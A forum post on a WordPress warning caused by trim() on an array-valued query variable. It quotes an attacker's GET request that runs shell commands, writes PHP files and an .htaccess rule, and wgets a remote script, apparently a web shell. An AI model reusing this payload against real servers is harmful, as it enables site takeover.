I ran into this today. It’s a bug. I filed a bug report here:
https://core.trac.wordpress.org/ticket/46797
The problem is this line of code:
$qv['name'] = trim( $qv['name'] );
A (malicious) user sends a request that looks like:
GET /?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=echo ‘Vuln!! patch it Now!’ > vuln.htm; echo ‘Vuln!!’> sites/default/files/vuln.php; echo ‘Vuln!!’> vuln.php; cd sites/default/files/; echo ‘AddType application/x-httpd-php .jpg’ > .htaccess; wget ‘http://40k.waszmann.de/Deutsch/images/up.php‘
Such a request makes $qv[‘name’] an array, not a string.
Needs to be sanitized.
Related Posts:
- ajax category filter
- Pagination custom query
- Order by two meta keys
- Warning: urlencode() expects parameter 1 to be string, array given
- Finding all results from database within 500 miles of the given latitude and longitude [closed]
- Function to check if author has posted within the last x days
- Shortcode returns escaped HTML tags
- Calling a custom excerpt function in a local loop
- How to get any tag ID
- Dynamically Override Fancy Title – Part II
- query posts in functions.php and update a field
- Get posts using WP_Query
- Finding post content that begins with a specific character
- Best practice custom function, where to echo the variables?
- How to get user_id from wordpress database inside ajax function?
- Undefined property: WP_Query::$post
- posts_per_page not working
- Exclude admin from WP_Query Contributors
- Multiple Loops Inside a Function
- How to delete taxonomy term when a wordpress user is removed?
- Exclude category for main query and custom
- Display posts from only one post form in custom query and exclude in main query
- Category applied to pages, creates multiple breadcrumb entries after a search query (On the translated site)
- How to filter, restrict and return posts based on custom user meta information
- WP Query using tax_query & meta_query
- wordpress search word, “hello world” ===> ‘hello+world’ ===> ‘hello’, ‘world’
- Display most popular in the past two days
- meta_query not working as expected
- New WP_Query calls Pre_get_posts filter twice
- how to access query string in wordpress?
- Merge two search functions for custom post type
- Make a SQL query with wpdb in WordPress
- how to use pre_gets_posts to exclude one queried ID from homepage loop
- Error with function in functions.php?
- Exclude authors IDs from WP_Query
- Loading two different AJAX requests on two different pages
- Getting the post terms ‘wp_get_post_terms’ per post when within the functions.php file
- How to load a script code only in posts?
- Multiple meta_key ordering with pre_get_posts
- How do I fit WP_Query arguments into a function?
- Create a notification for post field
- Add URL Rewrite Rule To WordPress
- Trying to get property of non-object in: $wp_query
- WordPress dynamic AJAX query
- relation OR instead of AND – Filtered term ID’s in loop
- Error: Attempt to read property “ID” on null
- Pagination repeating posts on search results
- How to check if logged in user have pending custom post?
- Custom WordPress post query for displaying time-released content on website
- SEARCH QUERY PLEASE HELP | call_user_func_array() expects parameter 1 to be a valid callback php
- Custom query for custom post type not getting correct post ID
- Finding post ID dynamically on click
- how to move a page from one drop down menu to another drop down menu
- How to upload 3 attachments to current post?
- Global page ID variable empty error
- WP_Query & shortcode : Return 3 articles from a category WordPress
- Get post Number with local loop and template
- Save query in function for custom gallery
- Seach and categories not working when ignoring sticky posts in main loop
- Problem with custom WP_Query and underlying pagination/posts_per_page
- Calling a function with WP_Query only ever brings the first result
- What argument does my function need to echo get_results() query results
- Fetching $_POST from Page Template into functions.php
- Declare inline background image in functions.php
- I wan to process the following js to process the AJAX Request on my function to calculate author Total Post views
- Hiding all posts/products/pages from a site based on a custom taxonomy/domain name
- ordering and optimizing functions
- Why WP_Query in functions.php is not working when get_posts works?
- Adding css tweak based on page template
- WP_Query and DES sort for Custom Taxonomy based upon a meta field?
- How to write a query-function as a query-shortcode?
- 1500+ duplicate queries via get_option function (query monitor)
- Variations as Single Products [closed]
- Excluding a category from frontpage but not from WP_Query
- Get posts from multiple tax terms
- apply custom where to the default $wp_query
- Use WP_Query or query_posts() or get_posts() for optimizing a site?
- get_posts always returning the same number of posts = 5
- “paged” in WP_Query returns 0 posts
- how to get wordpress user id when user register
- How to show one post different from the rest?
- How to exclude Sticky from Recent Post?
- Reduce number of SQL queries inside WP_Query loop to fetch author data
- Is there a way to make this kind of loop shorter and nicer?
- Highlight post in sidebar on single page
- WP_Query calls all posts?
- Specify strict ‘order by’ in WordPress query
- How to use WP_Query() on single.php?
- meta_query fails to compare on values containing apostrophes
- Default permalink structure causing Notice: Undefined property: WP_Query::$post
- How to check the array values, what WP_Query has brought to me?
- How to Order a list of taxonomies? orderby?
- Using WP_Query() in Magento shows error
- Search Page Returns Nothing
- WP Query – posts only by specific user
- get_posts() and global variables
- how can I get seperate the HTML in the_content(); output?
- sort and display posts by custom field (wp-query and the loop))
- get_the_terms – but only show 4 Posts
- Is wp_reset_postdata always necessary?